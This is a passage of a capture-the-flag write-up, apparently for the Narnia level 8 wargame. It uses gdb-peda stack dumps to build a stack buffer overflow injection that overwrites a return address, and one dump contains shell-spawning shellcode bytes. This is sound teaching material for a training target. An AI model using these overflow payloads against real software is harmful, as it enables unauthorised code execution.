\"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0008| 0xffffd4dc ('A' , \"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0012| 0xffffd4e0 (\"AAAAAAAAA\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 
\\320\\377\\367\\031%\\332\\367\\002\")\r\n0016| 0xffffd4e4 (\"AAAAA\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0020| 0xffffd4e8 --&gt; 0xffffd741 (\"=\/narnia\")\r\n0024| 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\n0028| 0xffffd4f0 --&gt; 0x8049211 (<main>:      add    esp,0x4)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080491e2 in func ()\r\ngdb-peda$\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3443674 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3443674\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-54954fd\" data-id=\"54954fd\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-08230a4 elementor-widget elementor-widget-text-editor\" data-id=\"08230a4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>On the stack, we still see our string of &#8220;A&#8221;s.<br \/><br \/><\/p><p>At address <code>0xffffd4e8<\/code>, where we should still have our argument, the pointer to it has been overwritten so that it now points to another string (&#8220;=\/narnia&#8221;).<br \/><br \/><\/p><p>Below this 
address, at <code>0xffffd4ec<\/code>, there is another pointer, which may be used by the for loop; it is better not to modify it. <br \/><br \/><\/p><p>And finally, we have the return address into the main function (at <code>0xffffd4f0<\/code>). This address will prove very useful, since it will allow us to execute a shellcode <img decoding=\"async\" class=\"emoji\" role=\"img\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/1f609.svg\" alt=\"\ud83d\ude09\" \/>.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b3d27da elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b3d27da\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-945c339\" data-id=\"945c339\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6f2b793 elementor-widget elementor-widget-heading\" data-id=\"6f2b793\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Building the injection<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-47396d2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"47396d2\" 
data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1c09e06\" data-id=\"1c09e06\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a902256 elementor-widget elementor-widget-text-editor\" data-id=\"a902256\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>The goal is therefore to overwrite main&#8217;s return address with the address of our shellcode, then pass in our shellcode, all without causing a crash.<\/p><p>Our injection will thus consist of:<\/p><ul><li>20 &#8220;A&#8221; to fill the buffer;\u00a0<\/li><li>The address of the string of &#8220;A&#8221;, so that the injection can be read in full;<\/li><li>The address 0xfffd4d8, written back unchanged so as not to cause a bug;<\/li><li>The return address, pointing to our shellcode;<\/li><li>Our shellcode, already used in previous challenges.<\/li><\/ul><p>It is important to run the script with an injection that already has the right size, because the addresses will vary accordingly:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0005bb2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0005bb2\" data-element_type=\"section\" 
data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2582a3b\" data-id=\"2582a3b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-71989a7 elementor-widget elementor-widget-image\" data-id=\"71989a7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"321\" height=\"401\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/03\/stack.drawio-1.png\" class=\"attachment-large size-large wp-image-789\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/03\/stack.drawio-1.png 321w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/03\/stack.drawio-1-240x300.png 240w\" sizes=\"(max-width: 321px) 100vw, 321px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e101a2e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e101a2e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e887491\" data-id=\"e887491\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-28c7d48 elementor-widget elementor-widget-text-editor\" 
data-id=\"28c7d48\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Your injection will thus look like this:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-090de07 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"090de07\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8e9254b\" data-id=\"8e9254b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3965169 elementor-widget elementor-widget-code-highlight\" data-id=\"3965169\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"A\"*20 + \"\\xff\\xff\\xff\\xff\" + \"\\xff\\xff\\xff\\xff\" + \"\\xff\\xff\\xff\\xff\" + \"\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-05a2f64 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"05a2f64\" 
data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ee1f443\" data-id=\"ee1f443\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-962f194 elementor-widget elementor-widget-text-editor\" data-id=\"962f194\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Let us now replace the placeholder addresses with real ones:<\/p><p>Run the program again with the injection at the right length, step through the instructions until the program has read the 20 &#8220;A&#8221;, and view the stack with the command:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a75f9be elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a75f9be\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-70b4cae\" data-id=\"70b4cae\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3123e10 elementor-widget elementor-widget-code-highlight\" data-id=\"3123e10\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div 
class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>x\/16xw $esp\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3f0e989 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3f0e989\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8b6d3cc\" data-id=\"8b6d3cc\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5b1e8dd elementor-widget elementor-widget-code-highlight\" data-id=\"5b1e8dd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>[----------------------------------registers-----------------------------------]\r\nEAX: 0xd8\r\nEBX: 0xf7fab000 --&gt; 0x229dac\r\nECX: 0x14\r\nEDX: 0x14\r\nESI: 0xffffd574 --&gt; 0xffffd6c8 (\"\/narnia\/narnia8\")\r\nEDI: 0xf7ffcb80 --&gt; 0x0\r\nEBP: 0xffffd4ac --&gt; 0xffffd4b8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\nESP: 0xffffd494 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 
\\320\\377\\367\\031%\\332\\367\\002\")\r\nEIP: 0x80491e2 (:      test   al,al)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80491da : mov    eax,DWORD PTR [ebp-0x4]\r\n   0x80491dd : add    eax,edx\r\n   0x80491df : movzx  eax,BYTE PTR [eax]\r\n=&gt; 0x80491e2 : test   al,al\r\n   0x80491e4 : jne    0x80491ae \r\n   0x80491e6 : lea    eax,[ebp-0x18]\r\n   0x80491e9 : push   eax\r\n   0x80491ea :        push   0x804a008\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd494 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0004| 0xffffd498 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0008| 0xffffd49c ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0012| 0xffffd4a0 (\"AAAAAAAA\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0016| 0xffffd4a4 (\"AAAA\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0020| 0xffffd4a8 --&gt; 0xffffd6d8 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\264\\324\\377\\377\\061\\300\\061\\333\\061\\311\\061\\377\\260\\311\u0340f\\211\\303f\\211\\301\\061\\300\\260F\u03401\\300Ph\/\/shh\/bin\\211\\343\\211\\301\\211\u00b0\\v\u03401\\300\\260\\001\u0340\")\r\n0024| 0xffffd4ac --&gt; 0xffffd4b8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\n0028| 0xffffd4b0 --&gt; 0x8049211 (<main>:      add    esp,0x4)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080491e2 in func ()\r\ngdb-peda$ 
x\/16xw $esp\r\n0xffffd494:     0x41414141      0x41414141      0x41414141      0x41414141\r\n0xffffd4a4:     0x41414141      0xffffd6d8      0xffffd4b8      0x08049211\r\n0xffffd4b4:     0xffffd6d8      0xf7ffd020      0xf7da2519      0x00000002\r\n0xffffd4c4:     0xffffd574      0xffffd580      0xffffd4e0      0xf7fab000\r\ngdb-peda$\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f7c757c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f7c757c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1ab68e8\" data-id=\"1ab68e8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ab6b206 elementor-widget elementor-widget-text-editor\" data-id=\"ab6b206\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>On the stack we can clearly see the 20 &#8220;A&#8221; (0x41), followed by an address (<code>0xffffd6d8<\/code>\u00a0in this case). This is the address of the string of &#8220;A&#8221;.<\/p><p>The next address (<code>0xffffd4b8<\/code>) is one that can be copied back as is. 
<br \/>Here is what the new injection looks like:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8695b26 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8695b26\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-89300d4\" data-id=\"89300d4\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8040486 elementor-widget elementor-widget-code-highlight\" data-id=\"8040486\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"A\"*20 + \"\\xd8\\xd6\\xff\\xff\" + \"\\xb8\\xd4\\xff\\xff\" + \"\\xff\\xff\\xff\\xff\" + \"\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b552b7f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b552b7f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column 
elementor-element elementor-element-29ab48b\" data-id=\"29ab48b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-30d1a19 elementor-widget elementor-widget-text-editor\" data-id=\"30d1a19\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tWe can now work out the address of the shellcode. <br><br>\n\nWe know that the shellcode is placed on the stack directly after <code>0xffffd4b8<\/code>.<br><br>\n\nTo get it, we simply subtract 4 from the previous address, which gives the following address: <br>\n<code>0xffffd4b8<\/code> &#8211; 4 = <code>0xffffd4b4<\/code>.<br><br>\n\nHere is what the final injection will look like in this case:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9849510 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9849510\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-05ba91d\" data-id=\"05ba91d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-abc2bff elementor-widget elementor-widget-code-highlight\" data-id=\"abc2bff\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div 
class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"A\"*20 + \"\\xd8\\xd6\\xff\\xff\" + \"\\xb8\\xd4\\xff\\xff\" + \"\\xb4\\xd4\\xff\\xff\" + \"shellcode\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ba2e04a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ba2e04a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b4f1613\" data-id=\"b4f1613\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3937157 elementor-widget elementor-widget-text-editor\" data-id=\"3937157\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>I keep saying &#8220;<strong>in this case<\/strong>&#8221; because these addresses can obviously vary depending on several parameters, notably the length of your shellcode.<br>\nIt is up to you to find the values for your own case!<\/blockquote>\n\nOnce all the values have been replaced, running the whole script should give you a shell running inside peda. 
<br>\nThis shell obviously does not have elevated privileges, but it lets you check that your injection is correct.<br><br>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0b2d3da elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0b2d3da\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c78d7be\" data-id=\"c78d7be\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5bbb00a elementor-widget elementor-widget-heading\" data-id=\"5bbb00a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Injecting without peda<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e7ec807 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e7ec807\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-450a9df\" data-id=\"450a9df\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap 
elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-56998d1 elementor-widget elementor-widget-text-editor\" data-id=\"56998d1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Take your injection and run the program with it.\u00a0<\/p><p>What happens? Normally, it does not work \ud83d\ude43.<\/p><p>You have done nothing wrong; it is just that the addresses outside peda are not the same.<\/p><p>They will have to be replaced.<\/p><p>View the stack with the command:\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0389952 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0389952\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5441082\" data-id=\"5441082\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8abe3ca elementor-widget elementor-widget-code-highlight\" data-id=\"8abe3ca\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>.\/narnia8  | 
xxd<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9048a0e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9048a0e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3c9fcc7\" data-id=\"3c9fcc7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f62644b elementor-widget elementor-widget-text-editor\" data-id=\"f62644b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>The<strong> <code>xxd<\/code> <\/strong>command produces a hex dump of its input, often used when reverse-engineering a file. 
In this case, it lets us view part of the stack:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f0c8668 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f0c8668\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d6accfa\" data-id=\"d6accfa\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-35cdb61 elementor-widget elementor-widget-code-highlight\" data-id=\"35cdb61\" data-element_type=\"widget\" data-e-type=\"widget\" 